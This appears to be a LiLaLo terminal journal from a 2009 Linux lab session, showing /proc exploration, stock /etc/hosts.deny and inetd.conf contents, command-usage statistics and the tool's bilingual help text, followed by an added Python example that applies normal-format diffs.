/proc/12627/task/12627/attr/sockcreate
/proc/12627/attr/sockcreate
/proc/13261/task/13261/attr/sockcreate
/proc/13261/attr/sockcreate
/proc/13398/task/13398/attr/sockcreate
/proc/13398/attr/sockcreate
/proc/13502/task/13502/attr/sockcreate
/proc/13502/attr/sockcreate
12:48:14
#find /proc -name \*sock\* | less
12:48:20
#find /proc -name \*file\* | less
12:48:28
#cat /proc/sys/fs/file-max
23289
12:48:45
#cat /proc/sys/fs/file-nr
1664    0       23289
12:48:48
#du -i\
>

Files

  • /etc/hosts
  • /etc/hosts.deny
  • /etc/inetd.conf
  • /proc/sys/fs/file-max
  • /proc/sys/fs/file-nr
  • `!!`
  • /etc/hosts
    >
    hosts        hosts.allow  hosts.deny
    
    /etc/hosts.deny
    >
    # /etc/hosts.deny: list of hosts that are _not_ allowed to access the system.
    #                  See the manual pages hosts_access(5) and hosts_options(5).
    #
    # Example:    ALL: some.host.name, .some.domain
    #             ALL EXCEPT in.fingerd: other.host.name, .other.domain
    #
    # If you're going to protect the portmapper use the name "portmap" for the
    # daemon name. Remember that you can only use the keyword "ALL" and IP
    # addresses (NOT host or domain names) for the portmapper, as well as for
    # rpc.mountd (the NFS mount daemon). See portmap(8) and rpc.mountd(8)
    # for further information.
    #
    # The PARANOID wildcard matches any host whose name does not match its
    # address.
    # You may wish to enable this to ensure any programs that don't
    # validate looked up hostnames still leave understandable logs. In past
    # versions of Debian this has been the default.
    # ALL: PARANOID
    bc: ALL
    
    /etc/inetd.conf
    >
    # /etc/inetd.conf:  see inetd(8) for further informations.
    #
    # Internet superserver configuration database
    #
    #
    # Lines starting with "#:LABEL:" or "#<off>#" should not
    # be changed unless you know what you are doing!
    #
    # If you want to disable an entry so it isn't touched during
    # package updates just comment it out with a single '#' character.
    #
    # Packages should modify this file by using update-inetd(8)
    #
    # <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
    #
    #:INTERNAL: Internal services
    #discard                stream  tcp     nowait  root    internal
    #discard                dgram   udp     wait    root    internal
    #daytime                stream  tcp     nowait  root    internal
    #time           stream  tcp     nowait  root    internal
    #:STANDARD: These are standard services.
    #:BSD: Shell, login, exec and talk are BSD protocols.
    #:MAIL: Mail, news and uucp services.
    #:INFO: Info services
    #:BOOT: TFTP service is provided primarily for booting.  Most sites
    #       run this only on machines acting as "boot servers."
    #:RPC: RPC based services
    #:HAM-RADIO: amateur-radio services
    #:OTHER: Other services
    9999            stream  tcp     nowait  approx  /usr/sbin/approx
    
    /proc/sys/fs/file-max
    >
    23289
    
    /proc/sys/fs/file-nr
    >
    1664    0       23289
    
    `!!`
    >
    cat `find /proc -name \*cookies\*`
    0
    

    Statistics

    Time of the first command in the journal: 10:33:22 2009-6-2
    Time of the last command in the journal: 12:48:48 2009-6-2
    Number of command lines in the journal: 101
    Share of commands with a non-zero exit code, %: 29.70
    Share of syntactically mistyped commands, %: 0.00
    Total time working at the terminal *, hours: 2.26
    Command lines per unit of time, commands/min: 0.75
    Command usage frequency
    Command                      Count  Share
    nc                              11  |========|  8.94%
    screen                          10  |========|  8.13%
    cat                              9  |=======|   7.32%
    netstat                          7  |=====|     5.69%
    find                             6  |====|      4.88%
    vi                               6  |====|      4.88%
    traceroute                       5  |====|      4.07%
    mtr                              4  |===|       3.25%
    10.0.35.100.38547:               4  |===|       3.25%
    which                            4  |===|       3.25%
    ethtool                          3  |==|        2.44%
    less                             3  |==|        2.44%
    grep                             3  |==|        2.44%
    REQUEST                          2  |=|         1.63%
    BROADCAST                        2  |=|         1.63%
    apt-get                          2  |=|         1.63%
    update-alternatives              2  |=|         1.63%
    ssh                              2  |=|         1.63%
    10.255.255.255.netbios-ns:       2  |=|         1.63%
    10:33:31.446512                  1  ||          0.81%
    while                            1  ||          0.81%
    pkill                            1  ||          0.81%
    10:33:26.858960                  1  ||          0.81%
    tracert                          1  ||          0.81%
    10:33:31.107051                  1  ||          0.81%
    10:33:45.777125                  1  ||          0.81%
    caÐеÐt                           1  ||          0.81%
    10.255.255.255.netbios-dgm:      1  ||          0.81%
    ls                               1  ||          0.81%
    do                               1  ||          0.81%
    10:33:24.183339                  1  ||          0.81%
    10:33:30.630126                  1  ||          0.81%
    10:40:44.365718                  1  ||          0.81%
    255.255.255.255.1211:            1  ||          0.81%
    10:40:44.167705                  1  ||          0.81%
    ps                               1  ||          0.81%
    10:33:31.916456                  1  ||          0.81%
    10:33:30.832047                  1  ||          0.81%
    netstat()                        1  ||          0.81%
    pgrep                            1  ||          0.81%
    10:40:43.752613                  1  ||          0.81%
    10:33:44.334563                  1  ||          0.81%
    lspci                            1  ||          0.81%
    10:33:45.334624                  1  ||          0.81%
    10:40:43.049578                  1  ||          0.81%
    10:33:23.333479                  1  ||          0.81%
    trace                            1  ||          0.81%
    kill                             1  ||          0.81%
    exit                             1  ||          0.81%
    10:33:30.018613                  1  ||          0.81%
    du                               1  ||          0.81%
    Already                          1  ||          0.81%
    apt-cache                        1  ||          0.81%
    10:40:44.657736                  1  ||          0.81%
    done                             1  ||          0.81%
    ____
    *) Inactivity intervals of 30 minutes or longer are not counted

    Справка

    Для того чтобы использовать LiLaLo, не нужно знать ничего особенного: всё происходит само собой. Однако, чтобы ведение и последующее использование журналов было как можно более эффективным, желательно иметь в виду следующее:
    1. В журнал автоматически попадают все команды, данные в любом терминале системы.

    2. Для того чтобы убедиться, что журнал на текущем терминале ведётся, и команды записываются, дайте команду w. В поле WHAT, соответствующем текущему терминалу, должна быть указана программа script.

    3. Команды, при наборе которых были допущены синтаксические ошибки, выводятся перечёркнутым текстом:
      $ l s-l
      bash: l: command not found
      

    4. Если код завершения команды равен нулю, команда была выполнена без ошибок. Команды, код завершения которых отличен от нуля, выделяются цветом.
      $ test 5 -lt 4
      Обратите внимание на то, что код завершения команды может быть отличен от нуля не только в тех случаях, когда команда была выполнена с ошибкой. Многие команды используют код завершения, например, для того чтобы показать результаты проверки

    5. Команды, ход выполнения которых был прерван пользователем, выделяются цветом.
      $ find / -name abc
      find: /home/devi-orig/.gnome2: Keine Berechtigung
      find: /home/devi-orig/.gnome2_private: Keine Berechtigung
      find: /home/devi-orig/.nautilus/metafiles: Keine Berechtigung
      find: /home/devi-orig/.metacity: Keine Berechtigung
      find: /home/devi-orig/.inkscape: Keine Berechtigung
      ^C
      

    6. Команды, выполненные с привилегиями суперпользователя, выделяются слева красной чертой.
      # id
      uid=0(root) gid=0(root) Gruppen=0(root)
      

    7. Изменения, внесённые в текстовый файл с помощью редактора, запоминаются и показываются в журнале в формате ed. Строки, начинающиеся символом "<", удалены, а строки, начинающиеся символом ">" -- добавлены.
      $ vi ~/.bashrc
      2a3,5
      >    if [ -f /usr/local/etc/bash_completion ]; then
      >         . /usr/local/etc/bash_completion
      >        fi
      

    8. Для того чтобы изменить файл в соответствии с показанными в диффшоте изменениями, можно воспользоваться командой patch. Нужно скопировать изменения, запустить программу patch, указав в качестве её аргумента файл, к которому применяются изменения, и всавить скопированный текст:
      $ patch ~/.bashrc
      В данном случае изменения применяются к файлу ~/.bashrc

    9. To get brief help on a command, hover the mouse pointer over it. A short description of the command appears in a tooltip.

      If help is available for a command, the command is highlighted with a light-blue background, for example: vi. If no help is available, the command is highlighted with a pink background, for example: notepad.exe. Help may be missing if (1) the command was typed incorrectly; (2) LiLaLo recognized the command incorrectly; (3) LiLaLo has no information about the command. The last case is possible for rarely used commands.

    10. Large tooltips, especially multi-line ones, are displayed best by the KDE Konqueror, Apple Safari and Microsoft Internet Explorer browsers. In Mozilla and Firefox they are displayed only partially, and a special character is shown in place of each line break.

    11. The command entry time shown in the journal is the time at which entry of the command line began, that is, the moment the shell prompt appeared on the terminal.

    12. The name of the terminal on which a command was entered is shown in a separate block. This block appears only when the terminal of the current command differs from that of the previous one.

    13. Journal elements that do not interest you at the moment, such as the time, the terminal name and others, can be hidden. To do this, use the journal control form at the top of the page.

    14. Short comments on commands can be inserted directly from the command line. The comment is typed on the command line after the characters #^ or #v. The characters ^ and v indicate which command the comment refers to: ^ means the previous one, v the next one. For example, if the following was entered on the command line:

      $ whoami
      
      user
      
      $ #^ I wonder, who am I?
      
      it will look like this in the journal:
      $ whoami
      
      user
      
      I wonder, who am I?

    15. If a comment spans several lines, it can be inserted into the journal as follows:

      $ whoami
      
      user
      
      $ cat > /dev/null #^ I wonder, who am I?
      
      The whoami program prints the name of the user under which 
      we are logged in to the system.
      -
      It cannot answer the question of what our purpose is 
      in this world.
      
      In the journal it will look like this:
      $ whoami
      user
      
      I wonder, who am I?
      The whoami program prints the name of the user under which
      we are logged in to the system.

      It cannot answer the question of what our purpose is
      in this world.
      To separate several paragraphs from each other, use the "-" character alone on a line.

    16. Comments that do not relate directly to any command are added in exactly the same way, except that the characters #= are used instead of #^ or #v.

    17. The contents of a file can be shown in the journal. To do this, print the file with the cat program. If the command's output is marked with the characters #!, the file's contents are shown in the journal in a dedicated section.
    18. To insert a screenshot of a window into the journal, use the l3shot command. After the command is invoked, select with the mouse the window that should appear in the journal.
    19. Commands in the journal are arranged in chronological order. If two commands were issued one after the other but on different terminals, they appear next to each other in the journal even if they are entirely unrelated.
      1
          2
      3   
          4
      
      Groups of commands executed on different terminals are separated by a special line. Below this line, in the right-hand corner, the name of the terminal on which the commands were executed is shown. To view the commands of one session only, click on this name.
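
The notation from items 7 and 8 can also be applied programmatically. The following is an added example, not part of LiLaLo or of the original journal: a Python function that applies a diff in this notation (the default output format of diff) to a list of lines and refuses to apply it when the "<" lines do not match the file. The function name and the sample file contents are assumptions made for illustration.

```python
import re

# Change command of a normal-format diff, e.g. "2a3,5", "4d3" or "1,2c1".
CMD = re.compile(r"^(\d+)(?:,(\d+))?([acd])\d+(?:,\d+)?$")

def apply_normal_diff(original, diff_text):
    """Return a new list of lines: `original` with `diff_text` applied."""
    out, pos = [], 0              # pos = lines of `original` consumed so far
    removed, added, hunks = [], [], []
    for line in diff_text.splitlines():
        m = CMD.match(line)
        if m:
            start, end, op = int(m[1]), int(m[2] or m[1]), m[3]
            removed, added = [], []
            hunks.append((start, end, op, removed, added))
        elif not hunks:
            raise ValueError(f"expected a change command, got {line!r}")
        elif line.startswith("<"):
            removed.append(line[2:])      # line deleted from the old file
        elif line.startswith(">"):
            added.append(line[2:])        # line inserted into the new file
        elif line != "---" and not line.startswith("\\"):
            raise ValueError(f"unexpected diff line: {line!r}")
    for start, end, op, removed, added in hunks:
        first = start if op == "a" else start - 1   # "a" keeps line `start`
        last = start if op == "a" else end
        if first < pos or last > len(original):
            raise ValueError(f"hunk at line {start} does not fit the file")
        if original[first:last] != removed:
            raise ValueError(f"lines {start}-{end} differ from the '<' lines")
        out += original[pos:first] + added
        pos = last
    return out + original[pos:]

# Constructed three-line stand-in for ~/.bashrc (an assumption, not the real file).
BASHRC = ["# ~/.bashrc", "export EDITOR=vi", "alias ll='ls -l'"]
# The diff shown in item 7, with the journal's indentation removed.
DIFF = """\
2a3,5
>    if [ -f /usr/local/etc/bash_completion ]; then
>         . /usr/local/etc/bash_completion
>        fi
"""

if __name__ == "__main__":
    print("\n".join(apply_normal_diff(BASHRC, DIFF)))
```

Because this notation carries no surrounding context lines, an "a" command is placed purely by line number; only "d" and "c" commands can be checked against the file's current contents.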

    About the program

    LiLaLo (L3) stands for Live Lab Log.
    The program was developed to make teaching Unix/Linux systems more effective.
    (c) Игорь Чубин, 2004-2008
